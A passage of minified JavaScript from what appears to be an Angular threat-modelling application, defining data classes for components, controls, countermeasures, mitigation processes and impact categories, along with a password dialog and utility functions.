"),m(27,"button",8),s(28),oe(29,"translate"),u(),s(30,"\n"),u(),s(31,"\n")),2&e&&(C(1),ke(re(2,9,"dialog.password.title")),C(5),V("ngIf",i.data.file),C(5),ke(re(12,11,"dialog.password.enterpassword")),C(3),V("type",i.show?"text":"password")("ngModel",i.data.pw),C(3),ke(i.show?"visibility_off":"visibility"),C(7),ke(re(25,13,"general.Cancel")),C(3),V("mat-dialog-close",!0),C(1),ke(re(29,15,"general.OK")))},dependencies:[Ri,an,Ta,Ea,oa,da,nn,un,jr,Xa,vm,Am,Tm,Em,Xi]}),t})();class Gi{static FindUniqueName(a,e){const n=e.filter(d=>d.startsWith(a)),c=n.filter(d=>(d=>{if(!d)return!1;for(let T=0;T<(null==d?void 0:d.length);T++)if(!(d[T]>="0"&&d[T]<="9"))return!1;return!0})(d[a.length])).map(d=>d.replace("-Reference","")).map(d=>Number(d.replace(a,"")));return 0==c.length?0==n.length||1==n.length&&n[0]!=a?a:a+"2":a+(Math.max(...c)+1).toString()}static GetNumber(a){let e="";for(let i=a.length-1;i>=0&&a[i]>="0"&&a[i]<="9";i--)e=a[i]+e;return e}static FromCamelCase(a){if(0==a.length)return"";let e=a[0];for(let i=1;i<a.length;i++){let n=a[i],r=a[i-1];n>="A"&&n<="Z"&&(r>="a"&&r<="z"||r>="0"&&r<="9")&&(e+=" "),e+=n}return e}static Format(a,...e){return a.replace(/{(\d+)}/g,(i,n)=>void 0!==e[n]?e[n]:i)}static EmptyIfNull(a){return null==a?"":a}static NullOrEmpty(a){return null==a||""==a}}const CG={randomUUID:"undefined"!=typeof crypto&&crypto.randomUUID&&crypto.randomUUID.bind(crypto)};let hT;const uwe=new Uint8Array(16);function hwe(){if(!hT&&(hT="undefined"!=typeof crypto&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto),!hT))throw new Error("crypto.getRandomValues() not supported. See https://github.com/uuidjs/uuid#getrandomvalues-not-supported");return hT(uwe)}const sc=[];for(let t=0;t<256;++t)sc.push((t+256).toString(16).slice(1));const Fo=function fwe(t,a,e){if(CG.randomUUID&&!a&&!t)return CG.randomUUID();const i=(t=t||{}).random||(t.rng||hwe)();if(i[6]=15&i[6]|64,i[8]=63&i[8]|128,a){e=e||0;for(let n=0;n<16;++n)a[e+n]=i[n];return a}return function yG(t,a=0){return(sc[t[a+0]]+sc[t[a+1]]+sc[t[a+2]]+sc[t[a+3]]+"-"+sc[t[a+4]]+sc[t[a+5]]+"-"+sc[t[a+6]]+sc[t[a+7]]+"-"+sc[t[a+8]]+sc[t[a+9]]+"-"+sc[t[a+10]]+sc[t[a+11]]+sc[t[a+12]]+sc[t[a+13]]+sc[t[a+14]]+sc[t[a+15]]).toLowerCase()}(i)};var Ja=(()=>{return(t=Ja||(Ja={}))[t.Added=1]="Added",t[t.Changed=2]="Changed",t[t.Removed=3]="Removed",Ja;var t})(),Ii=(()=>{return(t=Ii||(Ii={})).ArrowPosition="Arrow Position",t.AssignNumberToAsset="Assign Number To Asset",t.CheckBox="Check Box",t.DevInterfaceName="Device Interface Name",t.DataFlowChangeDirection="Data Flow Change Direction",t.DataFlowDiagramReference="Data Flow Diagram Reference",t.DiagramReference="Diagram Reference",t.ElementName="Element Name",t.FlowType="Flow Type",t.ImpactCategory="Impact Category",t.InterfaceElementSelect="Interface Element Select",t.LineType="Line Type",t.LowMediumHighSelect="Low Medium High Select",t.MyDataSelect="Data Select",t.PhysicalElementSelect="Physical Element Select",t.PortBox="Port Box",t.ProtocolSelect="Protocol Select",t.OpenNotes="Open Notes",t.OpenQuestionnaire="Open Questionnaire",t.StencilType="Stencil Type",t.TextArea="Text Area",t.TextBox="Text Box",t.TextBoxValidator="Text Box Validator",Ii;var t})();class bG{static GetTypeNames(){return Object.keys(Ii).map(a=>Ii[a]).filter(a=>"string"==typeof a)}static GetMappableTypeNames(){return[Ii.CheckBox,Ii.DiagramReference,Ii.LowMediumHighSelect,Ii.MyDataSelect,Ii.PhysicalElementSelect,Ii.StencilType,Ii.TextArea,Ii.TextBox]}}var li=(()=>{return(t=li||(li={}))[t.DeleteElementReferences=0]="DeleteElementReferences",t[t.MoveChildElements=1]="MoveChildElements",t[t.RemovePhysicalElementReference=2]="RemovePhysicalElementReference",t[t.DeleteDataFlow=3]="DeleteDataFlow",t[t.RemoveInterfaceReference=4]="RemoveInterfaceReference",t[t.DeleteAttackScenario=5]="DeleteAttackScenario",t[t.RemoveElementFromAttackScenario=6]="RemoveElementFromAttackScenario",t[t.RemoveElementFromTestCase=7]="RemoveElementFromTestCase",t[t.DeleteContextFlow=8]="DeleteContextFlow",t[t.ResetStencilType=9]="ResetStencilType",t[t.DeleteDFDElement=10]="DeleteDFDElement",t[t.DeleteThreatRule=11]="DeleteThreatRule",t[t.DeleteThreatRuleGroup=12]="DeleteThreatRuleGroup",t[t.DeleteThreatQuestion=13]="DeleteThreatQuestion",t[t.DeleteMyComponentType=14]="DeleteMyComponentType",t[t.DeleteComponent=15]="DeleteComponent",t[t.DeleteThreatCategory=16]="DeleteThreatCategory",t[t.DeleteAttackVector=17]="DeleteAttackVector",t[t.DeleteAttackVectorGroup=18]="DeleteAttackVectorGroup",t[t.RemoveStencilTypeTemplateFromStencilType=19]="RemoveStencilTypeTemplateFromStencilType",t[t.RemoveFromStencilProtocolStack=20]="RemoveFromStencilProtocolStack",t[t.RemoveFromElementProtocolStack=21]="RemoveFromElementProtocolStack",t[t.RemoveThreatCategoryFromAttackVector=22]="RemoveThreatCategoryFromAttackVector",t[t.RemoveThreatCategoryFromThreatRule=23]="RemoveThreatCategoryFromThreatRule",t[t.RemoveThreatCategoryFromAttackScenario=24]="RemoveThreatCategoryFromAttackScenario",t[t.RemoveThreatCategoryFromThreatMnemonic=25]="RemoveThreatCategoryFromThreatMnemonic",t[t.RemoveThreatQuestionFromComponent=26]="RemoveThreatQuestionFromComponent",t[t.RemoveAttackVectorFromControl=27]="RemoveAttackVectorFromControl",t[t.RemoveSystemThreatFromAttackScenario=28]="RemoveSystemThreatFromAttackScenario",t[t.DeleteDiagram=29]="DeleteDiagram",t[t.DeleteStack=30]="DeleteStack",t[t.DeleteMyData=31]="DeleteMyData",t[t.DeleteAssetGroup=32]="DeleteAssetGroup",t[t.DeleteControl=33]="DeleteControl",t[t.DeleteControlGroup=34]="DeleteControlGroup",t[t.DeleteCountermeasure=35]="DeleteCountermeasure",t[t.RemoveElementFromCountermeasure=36]="RemoveElementFromCountermeasure",t[t.RemoveAttackScenarioFromCountermeasure=37]="RemoveAttackScenarioFromCountermeasure",t[t.RemoveAttackScenarioFromAttackScenario=38]="RemoveAttackScenarioFromAttackScenario",t[t.RemoveAttackScenarioFromTestCase=39]="RemoveAttackScenarioFromTestCase",t[t.RemoveCountermeasureFromTestCase=40]="RemoveCountermeasureFromTestCase",t[t.RemoveMitigationProcessFromCountermeasure=41]="RemoveMitigationProcessFromCountermeasure",t[t.DeleteRequirementType=42]="DeleteRequirementType",t[t.RemoveRequirementTypeFromChecklistType=43]="RemoveRequirementTypeFromChecklistType",t[t.RemoveRequirementTypeFromChecklist=44]="RemoveRequirementTypeFromChecklist",t[t.DeleteChecklist=45]="DeleteChecklist",t[t.DeleteTestCase=46]="DeleteTestCase",t[t.RemoveMyTagFromAttackScenario=47]="RemoveMyTagFromAttackScenario",t[t.RemoveMyTagFromCountermeasure=48]="RemoveMyTagFromCountermeasure",t[t.RemoveMyTagFromMyTagChart=49]="RemoveMyTagFromMyTagChart",li;var t})();class MG{static ToString(a,e,i){var n,r,c;return a.Type===li.DeleteElementReferences?i.instant("dialog.delete.DeleteElementReferences")+" "+(null===(r=e.Project.FindDiagramOfElement(null===(n=a.Param)||void 0===n?void 0:n.ID))||void 0===r?void 0:r.Name):i.instant("dialog.delete."+li[a.Type])+" "+(null===(c=a.Param)||void 0===c?void 0:c.Name)}static FindAllReferencesDeep(a,e,i){let n=[];a.FindReferences(e,i).forEach(c=>{n.push(c),li[c.Type].startsWith("Delete")&&n.push(...this.FindAllReferencesDeep(c.Param,e,i))});let r=[];for(let c=1;c<n.length;c++){const d=n.findIndex(T=>T.Type==n[c].Type&&T.Param==n[c].Param);d>=0&&d<c&&r.push(c)}return r.forEach(c=>{n.splice(c,1)}),n}}class Ln{constructor(a){this.properties=[],this.NameChanged=new Tt,this.DataChanged=new Tt,this.Data=a,0==Object.keys(a).length&&(this.Data.ID=Fo(),this.Name="",this.Description=""),this.initProperties()}get ID(){return this.Data.ID}get Name(){return this.Data.Name.replace(/\n/g," ")}set Name(a){this.Data.Name=a,this.NameChanged.emit(a)}get NameRaw(){return this.Data.Name}set NameRaw(a){this.Name=a}get Description(){return this.Data.Description}set Description(a){this.Data.Description=a}GetProperties(){return this.properties}AddProperty(a,e,i,n,r,c,d,T){let k=this.properties.find(Y=>Y.ID==e&&Y.Type==r&&Y.Editable==c);if(k)return k;let q={DisplayName:a,ID:e,Tooltip:i,HasGetter:n,Type:r,Editable:c,Callback:T};return d&&(q.DefaultValue=d),this.properties.push(q),q}GetProperty(a){let e=this.properties.find(i=>i.ID==a);return e?e.HasGetter?this[e.ID]:this.Data[e.ID]:null}SetProperty(a,e){let i=this.properties.find(n=>n.ID==a);!i||(i.HasGetter?this[i.ID]=e:this.Data[i.ID]=e)}CopyFrom(a){const e=this.ID;this.Data=JSON.parse(JSON.stringify(a)),this.Data.ID=e}ToJSON(){return this.Data}initProperties(){this.AddProperty("properties.Name","Name","",!0,Ii.TextBox,!0),this.AddProperty("properties.Description","Description","",!0,Ii.TextArea,!0)}}class Np extends Ln{constructor(a){super(a),this.OutOfScopeChanged=new Tt,this.Data.UserCheckedElement||(this.Data.UserCheckedElement=!1),this.InitSubsriptions()}get UserCheckedElement(){return this.Data.UserCheckedElement}set UserCheckedElement(a){this.Data.UserCheckedElement=a}get OutOfScope(){return this.Data.OutOfScope}set OutOfScope(a){this.Data.OutOfScope=a,this.OutOfScopeChanged.emit(a)}initProperties(){super.initProperties(),this.GetProperties().find(a=>"Name"==a.ID).Type=Ii.TextArea,this.AddProperty("properties.OutOfScope","OutOfScope","",!0,Ii.CheckBox,!0,!1)}InitSubsriptions(){this.UserCheckedElement||setTimeout(()=>{this.subscription=this.NameChanged.subscribe(()=>{this.UserCheckedElement=!0,this.subscription.unsubscribe()})},1e3)}FindReferences(a,e){let i=[];return null==a||a.GetAttackScenarios().filter(n=>{var r;return n.Target==this||(null===(r=n.Targets)||void 0===r?void 0:r.includes(this))}).forEach(n=>{i.push(n.ThreatRule&&2==n.ThreatRule.RuleGenerationType&&null==n.Target?{Type:li.RemoveElementFromAttackScenario,Param:n}:{Type:li.DeleteAttackScenario,Param:n})}),null==a||a.GetCountermeasures().filter(n=>n.Targets.includes(this)).forEach(n=>i.push({Type:li.RemoveElementFromCountermeasure,Param:n})),null==a||a.GetTestCases().filter(n=>n.LinkedElements.includes(this)).forEach(n=>i.push({Type:li.RemoveElementFromTestCase,Param:n})),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{n.Type==li.DeleteAttackScenario?a.DeleteAttackScenario(n.Param):n.Type==li.RemoveElementFromAttackScenario?n.Param.Targets=n.Param.Targets.filter(r=>r!=this):n.Type==li.RemoveElementFromCountermeasure?n.Param.RemoveTarget(this.ID):n.Type==li.RemoveCountermeasureFromTestCase&&n.Param.RemoveLinkedElement(this.ID)})}}var zr=(()=>{return(t=zr||(zr={}))[t.None=0]="None",t[t.Software=1]="Software",t[t.Process=2]="Process",zr;var t})();class Kb extends Ln{constructor(a,e){super(a),this.config=e,this.Properties||(this.Properties=[])}get ComponentTypeID(){return this.Data.ComponentTypeID}set ComponentTypeID(a){this.Data.ComponentTypeID=a}get IsActive(){return this.Data.IsActive}set IsActive(a){this.Data.IsActive=a}get IsThirdParty(){return this.Data.IsThirdParty}set IsThirdParty(a){this.Data.IsThirdParty=a}get Properties(){return this.Data.Properties}set Properties(a){this.Data.Properties=a}FindReferences(a,e){let i=[];return e.GetThreatQuestions().filter(n=>n.ComponentType.ID==this.ID).forEach(n=>i.push({Type:li.DeleteThreatQuestion,Param:n})),null==a||a.GetComponents().filter(n=>n.Type.ID==this.ID).forEach(n=>i.push({Type:li.DeleteComponent,Param:n})),i}OnDelete(a,e){let i=this.FindReferences(a,e),n=e.FindGroupOfMyComponent(this);n&&n.RemoveMyComponentType(this),i.forEach(r=>{r.Type==li.DeleteThreatQuestion?e.DeleteThreatQuestion(r.Param):r.Type==li.DeleteComponent&&a.DeleteComponent(r.Param)})}static FromJSON(a,e){return new Kb(a,e)}}class Xb extends Ln{constructor(a,e){super(a),this.config=e,this.Data.myComponentTypeIDs||(this.Data.myComponentTypeIDs=[])}get Types(){let a=[];return this.Data.myComponentTypeIDs.forEach(e=>a.push(this.config.GetMyComponentType(e))),a}get ComponentTypeID(){return this.Data.ComponentTypeID}set ComponentTypeID(a){this.Data.ComponentTypeID=a}AddMyComponentType(a){this.Types.includes(a)||this.Data.myComponentTypeIDs.push(a.ID)}RemoveMyComponentType(a){this.Types.includes(a)&&this.Data.myComponentTypeIDs.splice(this.Data.myComponentTypeIDs.indexOf(a.ID),1)}FindReferences(a,e){let i=[];return this.Types.forEach(n=>i.push({Type:li.DeleteMyComponentType,Param:n})),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{n.Type==li.DeleteMyComponentType&&e.DeleteMyComponentType(n.Param)})}static FromJSON(a,e){return new Xb(a,e)}}class rf extends Np{constructor(a,e,i,n){super(a),this.project=i,this.config=n,this.Type||(this.Name=e.Name,this.IsActive=e.IsActive,this.IsThirdParty=e.IsThirdParty,this.Description=e.Description),this.Type=e,this.Data.threatQuestions||(this.Data.threatQuestions={}),this.Data.Notes||(this.Data.Notes=[]),this.Data.notesPerQuestion||(this.Data.notesPerQuestion={}),this.Version||(this.Version=""),this.Port||(this.Port=""),n.GetThreatQuestions().filter(r=>r.ComponentType.ID==e.ID).forEach(r=>this.AddThreatQuestion(r))}get IsActive(){return this.Data.IsActive}set IsActive(a){this.Data.IsActive=a}get IsThirdParty(){return this.Data.IsThirdParty}set IsThirdParty(a){this.Data.IsThirdParty=a}get Type(){return this.config.GetMyComponentType(this.Data.typeID)}set Type(a){this.Data.typeID=a.ID,this.setTypeProperties(a),this.TypeID=a.ComponentTypeID,this.TypeID==zr.Software&&(this.AddProperty("properties.Version","Version","",!0,Ii.TextBox,!0),this.AddProperty("properties.Port","Port","",!0,Ii.PortBox,!0))}get TypeID(){return this.Data.TypeID}set TypeID(a){this.Data.TypeID=a}get ThreatQuestions(){return this.Data.threatQuestions}get Version(){return this.Data.Version}set Version(a){this.Data.Version=a}get Port(){return this.Data.Port}set Port(a){this.Data.Port=a}get Notes(){return this.Data.Notes}set Notes(a){this.Data.Notes=a}get NotesPerQuestion(){return this.Data.notesPerQuestion}set NotesPerQuestion(a){this.Data.notesPerQuestion=a}get SyncNameToTypeName(){return this.Data.SyncNameToTypeName}set SyncNameToTypeName(a){this.Data.SyncNameToTypeName=a}get Name(){return this.Data.Name.replace(/\n/g," ")}set Name(a){this.Data.Name=a,this.SyncNameToTypeName&&(this.Type.Name=a),this.NameChanged.emit(a)}AddThreatQuestion(a){a.ID in this.Data.threatQuestions||(this.Data.threatQuestions[a.ID]=null)}RemoveThreatQuestion(a){this.Data.threatQuestions[a.ID]&&delete this.Data.threatQuestions[a.ID]}FindReferences(a,e){return super.FindReferences(a,e)}OnDelete(a,e){super.OnDelete(a,e);let i=a.GetStacks().find(n=>n.GetChildren().includes(this));i&&i.RemoveChild(this)}static FromJSON(a,e,i){let n=i.GetMyComponentType(a.typeID);return null==n&&(n=i.CreateMyComponentType(i.GetMyComponentTypeGroups(a.TypeID)[0]),n.Name=a.Name=a.Name+" - ERROR - Missing type"),new rf(a,n,e,i)}initProperties(){super.initProperties(),this.AddProperty("properties.IsActive","IsActive","",!0,Ii.CheckBox,!0),this.AddProperty("properties.IsThirdParty","IsThirdParty","",!0,Ii.CheckBox,!0),this.TypeID==zr.Software&&(this.AddProperty("properties.Version","Version","",!0,Ii.TextBox,!0),this.AddProperty("properties.Port","Port","",!0,Ii.PortBox,!0)),this.AddProperty("properties.Questionnaire","","",!1,Ii.OpenQuestionnaire,!0),this.AddProperty("general.Notes","","",!1,Ii.OpenNotes,!0)}setTypeProperties(a){a&&a.Properties&&a.Properties.forEach(e=>{this.AddProperty(null==e.DisplayName?e.ID:e.DisplayName,e.ID,e.Tooltip,e.HasGetter,e.Type,e.Editable),null==this.Data[e.ID]&&(this.Data[e.ID]=e.DefaultValue)})}}class Om extends Ln{constructor(a,e,i){super(a),this.ChildrenChanged=new Tt,this.project=e,this.Data.childrenIDs||(this.Data.childrenIDs=[]),null==this.ComponentTypeID&&this.children.length>0&&(this.ComponentTypeID=this.children[0].Type.ComponentTypeID)}get children(){let a=[];return this.Data.childrenIDs.forEach(e=>a.push(this.project.GetComponent(e))),a}get ComponentTypeID(){return this.Data.ComponentTypeID}set ComponentTypeID(a){this.Data.ComponentTypeID=a}get Root(){return this.project.GetStack(this.Data.rootID)}set Root(a){this.Data.rootID=null==a?void 0:a.ID}AddChild(a){null!=a?this.Data.childrenIDs.includes(a.ID)||(this.Data.childrenIDs.push(a.ID),this.Root?this.Root.ChildrenChanged.emit(!0):this.ChildrenChanged.emit(!0)):console.error("child undefined")}RemoveChild(a){const e=this.Data.childrenIDs.indexOf(a.ID);return e>=0&&(this.Data.childrenIDs.splice(e,1),this.Root?this.Root.ChildrenChanged.emit(!1):this.ChildrenChanged.emit(!1)),e>=0}DeleteChild(a){const e=this.Data.childrenIDs.indexOf(a.ID);return e>=0&&(this.Data.childrenIDs.splice(e,1),this.project.DeleteComponent(a),this.Root?this.Root.ChildrenChanged.emit(!1):this.ChildrenChanged.emit(!1)),e>=0}GetChildren(){return this.children}GetChildrenFlat(){return this.GetChildren()}FindReferences(a,e){let i=[];return this.GetChildren().forEach(n=>i.push({Type:li.DeleteComponent,Param:n})),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{n.Type==li.DeleteComponent&&a.DeleteComponent(n.Param)})}static FromJSON(a,e,i){return new Om(a,e,i)}}class Wg extends Ln{constructor(a,e){super(a),this.config=e,this.Data.mitigatedAttackVectorIDs||(this.Data.mitigatedAttackVectorIDs=[]),this.Data.mitigatedThreatRuleIDs||(this.Data.mitigatedThreatRuleIDs=[]),this.Data.MitigationTips||(this.Data.MitigationTips=[])}get MitigatedAttackVectors(){let a=[];return this.Data.mitigatedAttackVectorIDs.forEach(e=>a.push(this.config.GetAttackVector(e))),a}set MitigatedAttackVectors(a){this.Data.mitigatedAttackVectorIDs=null==a?void 0:a.map(e=>e.ID)}get MitigatedThreatRules(){let a=[];return this.Data.mitigatedThreatRuleIDs.forEach(e=>a.push(this.config.GetThreatRule(e))),a}set MitigatedThreatRules(a){this.Data.mitigatedThreatRuleIDs=null==a?void 0:a.map(e=>e.ID)}get MitigationTips(){return this.Data.MitigationTips}set MitigationTips(a){this.Data.MitigationTips=a}AddMitigatedAttackVector(a){this.MitigatedAttackVectors.includes(a)||this.Data.mitigatedAttackVectorIDs.push(a.ID)}RemoveMitigatedAttackVector(a){const e=this.MitigatedAttackVectors.indexOf(a);e>=0&&this.Data.mitigatedAttackVectorIDs.splice(e,1)}AddMitigatedThreatRule(a){this.MitigatedThreatRules.includes(a)||this.Data.mitigatedThreatRuleIDs.push(a.ID)}RemoveMitigatedThreatRule(a){const e=this.MitigatedThreatRules.indexOf(a);e>=0&&this.Data.mitigatedThreatRuleIDs.splice(e,1)}FindReferences(a,e){let i=[];return null==a||a.GetCountermeasures().filter(n=>n.Control==this).forEach(n=>i.push({Type:li.DeleteCountermeasure,Param:n})),i}OnDelete(a,e){let i=e.FindGroupOfControl(this);i&&i.RemoveControl(this),this.FindReferences(a,e).forEach(r=>{r.Type==li.DeleteCountermeasure&&a.DeleteCountermeasure(r.Param)})}static FromJSON(a,e){return new Wg(a,e)}}class Yb extends Ln{constructor(a,e){super(a),this.config=e,this.Data.controlGroupIDs||(this.Data.controlGroupIDs=[]),this.Data.controlIDs||(this.Data.controlIDs=[])}get SubGroups(){let a=[];return this.Data.controlGroupIDs.forEach(e=>a.push(this.config.GetControlGroup(e))),a}get Controls(){let a=[];return this.Data.controlIDs.forEach(e=>a.push(this.config.GetControl(e))),a}AddControlGroup(a){this.SubGroups.includes(a)||this.Data.controlGroupIDs.push(a.ID)}RemoveControlGroup(a){this.SubGroups.includes(a)&&this.Data.controlGroupIDs.splice(this.Data.controlGroupIDs.indexOf(a.ID),1)}AddControl(a){this.Controls.includes(a)||this.Data.controlIDs.push(a.ID)}RemoveControl(a){this.Controls.includes(a)&&this.Data.controlIDs.splice(this.Data.controlIDs.indexOf(a.ID),1)}FindReferences(a,e){let i=[];return this.SubGroups.forEach(n=>i.push({Type:li.DeleteControlGroup,Param:n})),this.Controls.forEach(n=>i.push({Type:li.DeleteControl,Param:n})),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{n.Type==li.DeleteControl?e.DeleteControl(n.Param):n.Type==li.DeleteControlGroup&&e.DeleteControlGroup(n.Param)}),e.FindGroupOfControlGroup(this).RemoveControlGroup(this)}static FromJSON(a,e){return new Yb(a,e)}}var Ra=(()=>{return(t=Ra||(Ra={}))[t.NotSet=1]="NotSet",t[t.NotApplicable=2]="NotApplicable",t[t.Rejected=3]="Rejected",t[t.NeedsInvestigation=4]="NeedsInvestigation",t[t.MitigationStarted=5]="MitigationStarted",t[t.Implemented=6]="Implemented",t[t.Duplicate=7]="Duplicate",Ra;var t})();class Sl{static GetMitigationStates(){return[Ra.NotSet,Ra.NotApplicable,Ra.Rejected,Ra.NeedsInvestigation,Ra.MitigationStarted,Ra.Implemented,Ra.Duplicate]}static GetDashboardMitigationStates(){return[Ra.NotSet,Ra.NeedsInvestigation,Ra.MitigationStarted,Ra.Implemented]}static ToString(a){switch(a){case Ra.NotSet:return"properties.mitigationstate.NotSet";case Ra.NotApplicable:return"properties.mitigationstate.NotApplicable";case Ra.Rejected:return"properties.mitigationstate.Rejected";case Ra.NeedsInvestigation:return"properties.mitigationstate.NeedsInvestigation";case Ra.MitigationStarted:return"properties.mitigationstate.ImplementationStarted";case Ra.Implemented:return"properties.mitigationstate.Implemented";case Ra.Duplicate:return"properties.mitigationstate.Duplicate";default:return console.error("Missing State in MitigationStateUtil.ToString()",a),"Undefined"}}}class Jl extends Ln{constructor(a,e,i){super(a),this.project=e,this.config=i,this.Data.attackScenarioIDs||(this.Data.attackScenarioIDs=[]),this.Data.MitigationState||(this.MitigationState=Ra.NotSet),this.Data.myTagIDs||(this.Data.myTagIDs=[])}get Name(){if(null!=this.Data.Name)return this.Data.Name;let a="";return this.Control&&(a+=this.Control.Name+" for "),this.Targets&&(a+=this.Targets.filter(e=>e).map(e=>e.GetProperty("Name")).join(", ")),a}set Name(a){this.Data.Name=a,this.NameChanged.emit(this.Name)}get Number(){return this.Data.Number}set Number(a){this.Data.Number=a&&String(a)}get ViewID(){return this.Data.ViewID}set ViewID(a){this.Data.ViewID=a}get MappingState(){return this.Data.MappingState}set MappingState(a){this.Data.MappingState=a}get MitigationState(){return this.Data.MitigationState}set MitigationState(a){this.Data.MitigationState=Number(a)}get IsGenerated(){return this.Data.IsGenerated}set IsGenerated(a){this.Data.IsGenerated=a}get RuleStillApplies(){return this.Data.RuleStillApplies}set RuleStillApplies(a){this.Data.RuleStillApplies=a}get Control(){return this.config.GetControl(this.Data.controlID)}set Control(a){this.Data.controlID=null==a?void 0:a.ID}get Targets(){let a=[];return this.Data.targetIDs.forEach(e=>{let i=this.project.GetDFDElement(e);if(i)a.push(i);else{let n=this.project.GetComponent(e);if(n)a.push(n);else{let r=this.project.GetContextElement(e);a.push(r||null)}}}),a}set Targets(a){this.Data.targetIDs=a.map(e=>e.ID)}get AttackScenarios(){let a=[];return this.Data.attackScenarioIDs.forEach(e=>a.push(this.project.GetAttackScenario(e))),a}set AttackScenarios(a){this.Data.attackScenarioIDs=null==a?void 0:a.map(e=>e.ID)}get MitigationProcess(){return this.project.GetMitigationProcess(this.Data.mitigationProcessID)}set MitigationProcess(a){this.Data.mitigationProcessID=null==a?void 0:a.ID}get AttackVectors(){var a;return null===(a=this.AttackScenarios)||void 0===a?void 0:a.map(e=>null==e?void 0:e.AttackVector).filter(e=>e).filter((e,i,n)=>n.indexOf(e)===i)}get MyTags(){let a=[];return this.Data.myTagIDs.forEach(e=>a.push(this.project.GetMyTag(e))),a}set MyTags(a){this.Data.myTagIDs=null==a?void 0:a.map(e=>e.ID)}SetMapping(a,e,i){this.MappingState=zn.New,this.Control=a,this.Targets=e,this.AttackScenarios=i,this.Name=null,this.RuleStillApplies=!0}AddAttackScenario(a){this.AttackScenarios.includes(a)||this.Data.attackScenarioIDs.push(a.ID)}RemoveAttackScenario(a){const e=this.Data.attackScenarioIDs.indexOf(a);e>=0&&this.Data.attackScenarioIDs.splice(e,1)}AddTarget(a){this.Targets.includes(a)||this.Data.targetIDs.push(a.ID)}RemoveTarget(a){const e=this.Data.targetIDs.indexOf(a);e>=0&&this.Data.targetIDs.splice(e,1)}AddMyTag(a){this.MyTags.includes(a)||this.Data.myTagIDs.push(a.ID)}RemoveMyTag(a){const e=this.Data.myTagIDs.indexOf(a);e>=0&&this.Data.myTagIDs.splice(e,1)}GetDiagram(){return this.project.GetView(this.ViewID)}GetTestCases(){return this.project.GetTestCases().filter(a=>a.LinkedMeasures.includes(this))}CheckUniqueNumber(){return this.project.GetCountermeasures().some(a=>a.Number==this.Number&&a.ID!=this.ID)}GetLongName(){var a;return"CM"+Gi.EmptyIfNull(this.Number)+") "+this.Name+" ("+(null===(a=this.Targets)||void 0===a?void 0:a.map(e=>e.Name).join(", "))+")"}CleanUpReferences(){let a=this.AttackScenarios;for(let i=a.length-1;i>=0;i--)null==a[i]&&this.Data.attackScenarioIDs.splice(i,1);let e=this.Targets;for(let i=e.length-1;i>=0;i--)null==e[i]&&this.Data.targetIDs.splice(i,1)}FindReferences(a,e){let i=[];return null==a||a.GetTestCases().filter(n=>n.LinkedMeasures.includes(this)).forEach(n=>i.push({Type:li.RemoveCountermeasureFromTestCase,Param:n})),i}OnDelete(a,e){this.MappingState=zn.Removed,this.FindReferences(a,e).forEach(n=>{n.Type==li.RemoveCountermeasureFromTestCase&&n.Param.RemoveLinkedCountermeasure(this.ID)})}static FromJSON(a,e,i){return new Jl(a,e,i)}}var kl=(()=>{return(t=kl||(kl={}))[t.NotStarted=1]="NotStarted",t[t.WorkInProgress=2]="WorkInProgress",t[t.Completed=3]="Completed",kl;var t})();class C2{static GetMitigationStates(){return[kl.NotStarted,kl.WorkInProgress,kl.Completed]}static ToString(a){switch(a){case kl.NotStarted:return"properties.mitigationprocessstate.NotStarted";case kl.WorkInProgress:return"properties.mitigationprocessstate.WorkInProgress";case kl.Completed:return"properties.mitigationprocessstate.Completed";default:return console.error("Missing State in MitigationProcessStateUtil.ToString()",a),"Undefined"}}}class Lp extends Ln{constructor(a,e,i){super(a),this.project=e,this.config=i,this.MitigationProcessState||(this.MitigationProcessState=kl.NotStarted),null==this.Progress&&(this.Progress=0),this.Data.Tasks||(this.Data.Tasks=[]),this.Data.Notes||(this.Data.Notes=[])}get Number(){return this.Data.Number}set Number(a){this.Data.Number=a&&String(a)}get Progress(){return this.Data.Progress}set Progress(a){this.Data.Progress=a}get Tasks(){return this.Data.Tasks}set Tasks(a){this.Data.Tasks=a}get Notes(){return this.Data.Notes}set Notes(a){this.Data.Notes=a}get MitigationProcessState(){return this.Data.MitigationProcessState}set MitigationProcessState(a){this.Data.MitigationProcessState=a}get Countermeasures(){return this.project.GetCountermeasures().filter(a=>a.MitigationProcess==this)}set Countermeasures(a){this.Countermeasures.filter(e=>!a.includes(e)).forEach(e=>e.MitigationProcess=null),a.forEach(e=>e.MitigationProcess=this)}CheckUniqueNumber(){return this.project.GetMitigationProcesses().some(a=>a.Number==this.Number&&a.ID!=this.ID)}GetLongName(){return"MP"+Gi.EmptyIfNull(this.Number)+") "+this.Name}FindReferences(a,e){let i=[];return this.Countermeasures.forEach(n=>i.push({Type:li.RemoveMitigationProcessFromCountermeasure,Param:n})),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{n.Type==li.RemoveMitigationProcessFromCountermeasure&&(n.Param.MitigationProcess=null)})}static FromJSON(a,e,i){return new Lp(a,e,i)}}var so=(()=>{return(t=so||(so={}))[t.Confidentiality=1]="Confidentiality",t[t.Integrity=2]="Integrity",t[t.Availability=3]="Availability",t[t.Authorization=4]="Authorization",t[t.Authenticity=5]="Authenticity",t[t.NonRepudiation=6]="NonRepudiation",t[t.Auditability=7]="Auditability",t[t.Trustworthiness=8]="Trustworthiness",t[t.Safety=9]="Safety",t[t.Privacy=10]="Privacy",t[t.Compliance=11]="Compliance",t[t.Financial=12]="Financial",t[t.Reputation=13]="Reputation",t[t.CustomerSatisfaction=14]="CustomerSatisfaction",t[t.ProductionProcess=15]="ProductionProcess",so;var t})();class Vs{static GetKeys(){return[so.Confidentiality,so.Integrity,so.Availability,so.Authorization,so.Authenticity,so.NonRepudiation,so.Auditability,so.Trustworthiness,so.Safety,so.Privacy,so.Compliance,so.Financial,so.Reputation,so.CustomerSatisfaction,so.ProductionProcess]}static ToString(a){switch(a){case so.Confidentiality:return"impactcategory.Confidentiality";case so.Integrity:return"impactcategory.Integrity";case so.Availability:return"impactcategory.Availability";case so.Authorization:return"impactcategory.Authorization";case so.Authenticity:return"impactcategory.Authenticity";case so.NonRepudiation:return"impactcategory.NonRepudiation";case so.Auditability:return"impactcategory.Auditability";case so.Trustworthiness:return"impactcategory.Trustworthiness";case so.Safety:return"impactcategory.Safety";case so.Privacy:return"impactcategory.Privacy";case 